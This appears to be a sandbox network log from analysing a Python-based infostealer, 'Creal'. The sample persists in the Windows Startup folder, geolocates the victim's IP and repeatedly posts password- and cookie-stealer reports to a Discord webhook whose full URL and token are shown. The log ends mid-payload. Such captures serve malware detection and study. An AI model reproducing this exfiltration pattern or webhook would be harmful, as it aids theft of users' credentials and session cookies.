2024-09-27 16:19:10 UTC	1341	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:10 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3a97a79a7cec11efb22fceb003a448a0; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 0 x-ratelimit-reset: 1727453953 x-ratelimit-reset-after: 2 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fo0xIDXdk%2FEb2pBPcbbsLO%2F861QO1SXo8pyDfSImZ%2Btk0dzXI4e1u7z%2FRCV%2FKE1L%2FbKWjdZ45elUa7sU2iNnpM8EIGVqY5IgVvZiah1ee5aEdSrnPH9RuO7rBHTG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3a97a79a7cec11efb22fceb003a448a0a30708dd50747fb654ca905820209b63cb8882db4594a413bb62fdda33d67ddb; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=ae131b04a6811b8fe62774872c5a2e51e774318a-1727453950; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:10 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6c 4e 50 59 34 47 31 75 77 74 6d 45 49 4f 6d 38 76 78 45 50 72 58 73 62 51 48 42 79 34 6a 6d 71 6d 46 4e 30 39 33 42 4d 30 62 59 2d 31 37 32 37 34 35 33 39 35 30 39 30 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 35 38 62 63 37 35 34 32 64 66 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=lNPY4G1uwtmEIOm8vxEPrXsbQHBy4jmqmFN093BM0bY-1727453950904-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd058bc7542df-EWR
2024-09-27 16:19:10 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.8	49773	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:11 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 649 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:11 UTC	649	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\nData:\n<a:hira_kasaanahtari:886942856969875476> \u2022 0
2024-09-27 16:19:11 UTC	1367	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:11 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3afd845c7cec11ef97469e0750befc3d; Expires=Wed, 26-Sep-2029 16:19:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 1 x-ratelimit-reset: 1727453953 x-ratelimit-reset-after: 2 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p9w6Hm%2BLNVwz0hn0%2FfzMj6E2MKCs37DSbqvW5AlakoQhJ1FfRD5rQ2o9tB0r1%2BPP%2FhLot20ZKtTquqefMB6bBq5KSJSGspfyVKIkwzyTMHyEZ9X9aulbPMFmKZjw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3afd845c7cec11ef97469e0750befc3d03996fc30570ab35836a8ac92ecebe2d236bc94c97af53f7fd9683c73c50609e; Expires=Wed, 26-Sep-2029 16:19:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=1776ad4596ce0722254a07daac3e820e46266c04-1727453951; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:11 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 64 4a 59 32 38 37 6f 72 5f 6b 4c 4c 54 66 56 32 6a 54 61 2e 47 33 76 71 78 56 4f 35 77 55 33 61 2e 34 37 75 69 73 4a 4f 65 41 6b 2d 31 37 32 37 34 35 33 39 35 31 35 37 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 35 63 65 63 33 31 34 34 30 65 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=dJY287or_kLLTfV2jTa.G3vqxVO5wU3a.47uisJOeAk-1727453951574-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd05cec31440e-EWR
2024-09-27 16:19:11 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.8	49775	172.67.74.152	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:13 UTC	117	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:19:13 UTC	211	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 16:19:13 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c9cd0698e3d4369-EWR
2024-09-27 16:19:13 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.8	49776	159.89.102.253	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:14 UTC	139	OUT	GET /jsonp/8.46.123.33 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.12 Connection: close
2024-09-27 16:19:14 UTC	206	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 27 Sep 2024 16:19:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
2024-09-27 16:19:14 UTC	171	IN	Data Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.8	49777	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:15 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:15 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:19:15 UTC	1333	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:15 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3d38dc6c7cec11efb31b2a3ebeb9a63a; Expires=Wed, 26-Sep-2029 16:19:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453956 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EO6AHeiMi7fYFfLEGWS9ziqMgNN20IDvQotdN70lFLR6bNNigkKwMrvAbOGUxT4Ont1O4gMOJ7mfoVXFC09%2BWR0TI3aCSmcbZhZwrysIxOic8lSb81J9%2BNN1JAgn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3d38dc6c7cec11efb31b2a3ebeb9a63ac715dba4bca04b42c203381de31eb28e75f4c84c74e77d1df6deb842be5834b2; Expires=Wed, 26-Sep-2029 16:19:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=4efeb2ea3a62e495dc352b88af2e585aefa65edc-1727453955; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:15 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 69 32 74 6b 50 6c 6a 78 63 6a 42 6a 4e 33 41 6a 73 38 6b 46 57 68 66 30 63 46 33 33 55 31 73 5f 46 54 38 69 79 46 31 78 4e 58 55 2d 31 37 32 37 34 35 33 39 35 35 33 31 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 37 34 35 63 39 33 34 34 37 61 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=i2tkPljxcjBjN3Ajs8kFWhf0cF33U1s_FT8iyF1xNXU-1727453955317-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0745c93447a-EWR
2024-09-27 16:19:15 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.8	49778	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:16 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:16 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:19:16 UTC	1341	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:16 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3dc1a8587cec11ef820dd2e2dbf32e93; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453957 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FsnFqJvXlU%2BwbM284fPah8DEEMLoHF79%2ByVP3zX5yY6w2vcYVMJJP8CIgb8taqqDF%2Bi%2FN7UMhI7HMlyE3xLwHN%2BTxnaKQH3eDgSnveqrVJ4AfIAC4gZBqiPvUHDV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3dc1a8587cec11ef820dd2e2dbf32e937fca7de2edb84f95324207f86c51753bdba706d58d230b7676189baa895fcef8; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=54de805462c8499a30bede896a7ff29380fc6fc8-1727453956; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:16 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 4b 78 42 4e 5f 54 66 68 45 57 6c 4f 61 44 45 30 64 4b 5f 7a 69 4a 59 66 45 45 4b 42 39 32 62 69 36 44 4b 44 74 6d 4e 50 53 59 51 2d 31 37 32 37 34 35 33 39 35 36 32 31 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 37 61 30 66 64 38 37 32 62 37 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=KxBN_TfhEWlOaDE0dK_ziJYfEEKB92bi6DKDtmNPSYQ-1727453956213-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd07a0fd872b7-EWR
2024-09-27 16:19:16 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.8	49779	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:16 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:16 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: Accounts:\n\n\n\nData:\n<:cookies_tlm:816619063618568234> \u2022 2 Cooki
2024-09-27 16:19:16 UTC	1335	IN	HTTP/1.1 404 Not Found Date: Fri, 27 Sep 2024 16:19:16 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=3e251fdc7cec11ef963cbe4fcb513092; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1727453958 x-ratelimit-reset-after: 1 via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z6rjdjZ8kvmdTE%2B9gYZyS3cRo6znglB7LfM7m%2F42MoGnlGw4rRTTrGKAPNdeif3iRGaxI5YsftF9BaBUxxA6s6LR1%2BDJULwTdMmYSt4VNtJ7Dz70MJEEJWRf2WKl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=3e251fdc7cec11ef963cbe4fcb513092934b8e633dcc6eb2e11fd1c92a5613ed8d8ebdb0dea4b547b3e1167c1e4bcc4b; Expires=Wed, 26-Sep-2029 16:19:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=54de805462c8499a30bede896a7ff29380fc6fc8-1727453956; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-09-27 16:19:16 UTC	211	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 68 51 72 72 6b 6b 44 78 59 69 38 7a 66 53 64 6e 4b 37 36 57 30 75 7a 4e 50 69 37 35 34 54 67 36 73 58 63 48 72 6e 48 6d 42 34 41 2d 31 37 32 37 34 35 33 39 35 36 38 37 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 37 65 30 38 35 36 34 32 34 66 2d 45 57 52 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=hQrrkkDxYi8zfSdnK76W0uzNPi754Tg6sXcHrnHmB4A-1727453956871-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd07e0856424f-EWR
2024-09-27 16:19:16 UTC	45	IN	Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d Data Ascii: {"message": "Unknown Webhook", "code": 10015}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.8	49780	162.159.136.232	443	5340	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 16:19:17 UTC	332	OUT	POST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1 Accept-Encoding: identity Content-Length: 647 Host: discord.com Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Connection: close
2024-09-27 16:19:17 UTC	647	OUT	Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69 Data Ascii: {"content": ":flag_us: - `user \| 8.46.123.33 (United States)`", "embeds": [{"title": "Creal \| Cookies Stealer", "description": 